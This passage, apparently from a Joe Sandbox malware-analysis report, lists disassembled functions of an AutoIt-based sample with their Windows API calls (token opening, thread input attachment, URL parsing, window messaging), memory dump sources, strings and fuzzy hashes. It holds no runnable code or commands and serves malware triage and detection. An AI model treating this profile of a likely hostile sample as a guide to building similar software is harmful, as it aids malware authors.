                                            Function 0086EA6A Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0081AFE3
                                              • Part of subcall function 0081AF83: SelectObject.GDI32(?,00000000), ref: 0081AFF2
                                              • Part of subcall function 0081AF83: BeginPath.GDI32(?), ref: 0081B009
                                              • Part of subcall function 0081AF83: SelectObject.GDI32(?,00000000), ref: 0081B033
                                            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0086EA8E
                                            • LineTo.GDI32(00000000,?,?), ref: 0086EA9B
                                            • EndPath.GDI32(00000000), ref: 0086EAAB
                                            • StrokePath.GDI32(00000000), ref: 0086EAB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                            • String ID:
                                            • API String ID: 1539411459-0
                                            • Opcode ID: 5c5477dc8174c75bc4dff2cb43be60e7274cb3a97c5a5d6fab7f4ede2a396ba0
                                            • Instruction ID: 5fc673a90730edc917874ccf065a624b0697e13bdfa6390a4a4169e1fdbf5c43
                                            • Opcode Fuzzy Hash: 5c5477dc8174c75bc4dff2cb43be60e7274cb3a97c5a5d6fab7f4ede2a396ba0
                                            • Instruction Fuzzy Hash: 68F08231045669BBDF12AF98AC0DFCE3F2ABF16311F044201FA11A50E2C7745552DB95
                                            Function 0083C82D Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0083C84A
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 0083C85D
                                            • GetCurrentThreadId.KERNEL32 ref: 0083C864
                                            • AttachThreadInput.USER32(00000000), ref: 0083C86B
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                            • String ID:
                                            • API String ID: 2710830443-0
                                            • Opcode ID: 8e9eb0302cbbcc9e18793a0bf72872b90debffee446a489f7c462a7266da6f5a
                                            • Instruction ID: bd6789e12d36f19bf5d6968b157eae838aaf00a226eb052835e147046f19982c
                                            • Opcode Fuzzy Hash: 8e9eb0302cbbcc9e18793a0bf72872b90debffee446a489f7c462a7266da6f5a
                                            • Instruction Fuzzy Hash: 27E03971141328BADB206BA69C0DEDB7F1CFF567A1F008021B609D44A1D7B18681CBE0
                                            Function 0083B0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentThread.KERNEL32 ref: 0083B0D6
                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,0083AC9D), ref: 0083B0DD
                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0083AC9D), ref: 0083B0EA
                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,0083AC9D), ref: 0083B0F1
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CurrentOpenProcessThreadToken
                                            • String ID:
                                            • API String ID: 3974789173-0
                                            • Opcode ID: 5eb83e73114d80d6ee9d3b393319eefd353a6d325ae72e0281cb43f53cefe50a
                                            • Instruction ID: 53f078f442c815f775c057a4df164d2a966976c6f01f92082b209979cf74ca76
                                            • Opcode Fuzzy Hash: 5eb83e73114d80d6ee9d3b393319eefd353a6d325ae72e0281cb43f53cefe50a
                                            • Instruction Fuzzy Hash: 21E086726413129BD7202FB65C0CF473BA9FF95795F118828F341D60C0EB348401C761
                                            Function 0081B47D Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSysColor.USER32(00000008), ref: 0081B496
                                            • SetTextColor.GDI32(?,000000FF), ref: 0081B4A0
                                            • SetBkMode.GDI32(?,00000001), ref: 0081B4B5
                                            • GetStockObject.GDI32(00000005), ref: 0081B4BD
                                            • GetWindowDC.USER32(?,00000000), ref: 0087DE2B
                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 0087DE38
                                            • GetPixel.GDI32(00000000,?,00000000), ref: 0087DE51
                                            • GetPixel.GDI32(00000000,00000000,?), ref: 0087DE6A
                                            • GetPixel.GDI32(00000000,?,?), ref: 0087DE8A
                                            • ReleaseDC.USER32(?,00000000), ref: 0087DE95
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                            • String ID:
                                            • API String ID: 1946975507-0
                                            • Opcode ID: 07db5047beb1261ebc45b5c3d512f6d3cf5134452198adafe45a718a91f7f8b4
                                            • Instruction ID: c26ea752dd3accd54284a5b180b9f0998ab38068f25b84a9ac10f8305a0d701c
                                            • Opcode Fuzzy Hash: 07db5047beb1261ebc45b5c3d512f6d3cf5134452198adafe45a718a91f7f8b4
                                            • Instruction Fuzzy Hash: D1E0C935100340AADB216B68AC0DBD87B22FF51335F14C666F669980E6C77189819B11
                                            Function 0087B29A Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CapsDesktopDeviceReleaseWindow
                                            • String ID:
                                            • API String ID: 2889604237-0
                                            • Opcode ID: d593e1e7a81f6170774c774c54de904bbb435228635b1363e6a968a661a8d613
                                            • Instruction ID: efedc9b39a02a14ccacf2ec7626f0b6afdb11cad878c9f569b7c83d8e02bbfd5
                                            • Opcode Fuzzy Hash: d593e1e7a81f6170774c774c54de904bbb435228635b1363e6a968a661a8d613
                                            • Instruction Fuzzy Hash: D1E01AB1100308EFDB00AF748848A6D7BA9FF5C354F11C805F95AC7291DA7498408B80
                                            Function 0083B2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                            Download Yara Rule
                                            APIs
                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0083B2DF
                                            • UnloadUserProfile.USERENV(?,?), ref: 0083B2EB
                                            • CloseHandle.KERNEL32(?), ref: 0083B2F4
                                            • CloseHandle.KERNEL32(?), ref: 0083B2FC
                                              • Part of subcall function 0083AB24: GetProcessHeap.KERNEL32(00000000,?,0083A848), ref: 0083AB2B
                                              • Part of subcall function 0083AB24: HeapFree.KERNEL32(00000000), ref: 0083AB32
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                            • String ID:
                                            • API String ID: 146765662-0
                                            • Opcode ID: e4f96b8c0edc705b0e242efd287fa0d62f322b8c728fe6b0218dfb9f7193f736
                                            • Instruction ID: 024f51b1709c5675a4e4bdff3c7bb0d1f7094dfe24e50eab293d09e5fb8ac9e3
                                            • Opcode Fuzzy Hash: e4f96b8c0edc705b0e242efd287fa0d62f322b8c728fe6b0218dfb9f7193f736
                                            • Instruction Fuzzy Hash: A2E0EC3A104106BFDB013FA9EC08859FFB6FF983213108221F625816B1DB32A871EB91
                                            Function 0087B2AE Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CapsDesktopDeviceReleaseWindow
                                            • String ID:
                                            • API String ID: 2889604237-0
                                            • Opcode ID: faecfa95bfbf32b8f88f49e630eb377cd8ff72c0a4313fc64af03eb14ab1b05f
                                            • Instruction ID: be894376a6b8bbf84d513615d669b53a5dc7e08f7aad1b94b74245b1dde98616
                                            • Opcode Fuzzy Hash: faecfa95bfbf32b8f88f49e630eb377cd8ff72c0a4313fc64af03eb14ab1b05f
                                            • Instruction Fuzzy Hash: CFE046B1500308EFDB00AF78C848A6D7BA9FF5C390F118809F95ECB291EB7898408B80
                                            Function 0083DCDF Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                            Download Yara Rule
                                            APIs
                                            • OleSetContainedObject.OLE32(?,00000001), ref: 0083DEAA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ContainedObject
                                            • String ID: AutoIt3GUI$Container
                                            • API String ID: 3565006973-3941886329
                                            • Opcode ID: 5b2640f6d054fcc6d16c6c8bc1c8f0b5b4e21b1d7962df07b14c0976a91d80ed
                                            • Instruction ID: 35f4f513ce638eb181f03685be9ac486d2e7b8d4dcf106456ed3068d8e9fb8cb
                                            • Opcode Fuzzy Hash: 5b2640f6d054fcc6d16c6c8bc1c8f0b5b4e21b1d7962df07b14c0976a91d80ed
                                            • Instruction Fuzzy Hash: A99127706007059FDB14DF68D884E6ABBB9FF89714F14896DF94ACB291DB70E841CBA0
                                            Function 0081BCC9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            • Sleep.KERNEL32(00000000), ref: 0081BCDA
                                            • GlobalMemoryStatusEx.KERNEL32 ref: 0081BCF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: GlobalMemorySleepStatus
                                            • String ID: @
                                            • API String ID: 2783356886-2766056989
                                            • Opcode ID: 558102fde0359c8aed35786248529b767c9fbcd4727921cc39c4dabd26ae5e46
                                            • Instruction ID: e6906610d67f5dbff2ecb33e9d5943f7742e7d7f82f7cf2f11ad89084dc7bc12
                                            • Opcode Fuzzy Hash: 558102fde0359c8aed35786248529b767c9fbcd4727921cc39c4dabd26ae5e46
                                            • Instruction Fuzzy Hash: E15126714087489BE320AF18D886BAFBBECFF95354F414C4DF1C8810A6DB7085A98757
                                            Function 0084C56D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 008044ED: __fread_nolock.LIBCMT ref: 0080450B
                                            • _wcscmp.LIBCMT ref: 0084C65D
                                            • _wcscmp.LIBCMT ref: 0084C670
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _wcscmp$__fread_nolock
                                            • String ID: FILE
                                            • API String ID: 4029003684-3121273764
                                            • Opcode ID: a5a4a35743337e02e98fcb300d0e770f62b552c55dc40f0f0a3af649b0cc51d6
                                            • Instruction ID: 8e2c35cc11a63a7c367e426cf215bc33fac298818514e8b541b763b2ad81d586
                                            • Opcode Fuzzy Hash: a5a4a35743337e02e98fcb300d0e770f62b552c55dc40f0f0a3af649b0cc51d6
                                            • Instruction Fuzzy Hash: 1A41E572A4021ABADF609BA89C42FEF77BDFF49704F014069F605EB181D6709A448B61
                                            Function 0086A76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 0086A85A
                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0086A86F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: '
                                            • API String ID: 3850602802-1997036262
                                            • Opcode ID: b313c507c623e745f8e1c4fb34fa98bf0cc07724d8eb8fb62f96d90c5f80996e
                                            • Instruction ID: a9d4eeba962876268cfafd468ca43191b80fd4f6bd9d206dba0065326d95e1a3
                                            • Opcode Fuzzy Hash: b313c507c623e745f8e1c4fb34fa98bf0cc07724d8eb8fb62f96d90c5f80996e
                                            • Instruction Fuzzy Hash: 1341E774A013099FDB58CFA8D881BDABBB9FB09304F15016AE905EB381D770A941CF91
                                            Function 00855180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 00855190
                                            • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 008551C6
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CrackInternet_memset
                                            • String ID: |
                                            • API String ID: 1413715105-2343686810
                                            • Opcode ID: c3f68bc0162e5fd21252e4193def18350a9f2f282644b0a37069574d6ae9c1d3
                                            • Instruction ID: 78e0885407667d2e9f1d93cc7553f3539e5d4d569edae79a7fee278dada54cfc
                                            • Opcode Fuzzy Hash: c3f68bc0162e5fd21252e4193def18350a9f2f282644b0a37069574d6ae9c1d3
                                            • Instruction Fuzzy Hash: 87313B71C00119ABCF41EFE8CD85AEE7FB9FF14714F100115F815A6166EB31A956CBA1
                                            Function 0086975A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                            Download Yara Rule
                                            APIs
                                            • DestroyWindow.USER32(?,?,?,?), ref: 0086980E
                                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0086984A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$DestroyMove
                                            • String ID: static
                                            • API String ID: 2139405536-2160076837
                                            • Opcode ID: 4600f75cce2563a97a1612c8fb48203a64f28b753d71e6d8497e318dfe5258ef
                                            • Instruction ID: 1092e147b425fdfe5f475ce83f591f897d2c642bd8a4203bf2cb144a6e009752
                                            • Opcode Fuzzy Hash: 4600f75cce2563a97a1612c8fb48203a64f28b753d71e6d8497e318dfe5258ef
                                            • Instruction Fuzzy Hash: B4317E71110604AEEB109F78CC81BFB77ADFF99764F118629F9A9C7190DA31AC81C760
                                            Function 00845157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 008451C6
                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00845201
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: InfoItemMenu_memset
                                            • String ID: 0
                                            • API String ID: 2223754486-4108050209
                                            • Opcode ID: 20d0bdff8650b6a78b42dc032428ad9eef64d3fbc435fe60c5d6862aaff28efd
                                            • Instruction ID: 0caf74d83af9e6ca2fa9ef57eaa71472756c7b1b708236b70bc6cc911db785c0
                                            • Opcode Fuzzy Hash: 20d0bdff8650b6a78b42dc032428ad9eef64d3fbc435fe60c5d6862aaff28efd
                                            • Instruction Fuzzy Hash: 5B31E63160072CABEB24CF99D845B9EBBF8FF45354F14401BE981E61A2D7B09A44CB11
                                            Function 0085658B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __snwprintf
                                            • String ID: , $$AUTOITCALLVARIABLE%d
                                            • API String ID: 2391506597-2584243854
                                            • Opcode ID: 5e3fa0a3f06a16b209eaf1d2ba1fa020a1bcba508435c307f567d212ba37e287
                                            • Instruction ID: 012fb6d07cffebc3fb991915d8db0a8c39e842591b9ef36eff9f1b3ff0df81cf
                                            • Opcode Fuzzy Hash: 5e3fa0a3f06a16b209eaf1d2ba1fa020a1bcba508435c307f567d212ba37e287
                                            • Instruction Fuzzy Hash: 57217F71600218AACF14EFA8CC82AAE77B4FF55301F400459F505EB281EB70EA59CBA2
                                            Function 008693CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0086945C
                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00869467
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID: Combobox
                                            • API String ID: 3850602802-2096851135
                                            • Opcode ID: 3a09428cc266cd29630e9403186191f0c0028ebb72ff586377e7043a083d9b10
                                            • Instruction ID: 01367b7c1bbe3a5b0ed60e6ab61ed03a1baf07a672f07c25306da2466cfed8b1
                                            • Opcode Fuzzy Hash: 3a09428cc266cd29630e9403186191f0c0028ebb72ff586377e7043a083d9b10
                                            • Instruction Fuzzy Hash: 701190B1200208AFEF119F58DC80EBB376EFB583A4F110125F958DB2D0DA319C528764
                                            Function 008698FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0081D1BA
                                              • Part of subcall function 0081D17C: GetStockObject.GDI32(00000011), ref: 0081D1CE
                                              • Part of subcall function 0081D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0081D1D8
                                            • GetWindowRect.USER32(00000000,?), ref: 00869968
                                            • GetSysColor.USER32(00000012), ref: 00869982
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                                            • String ID: static
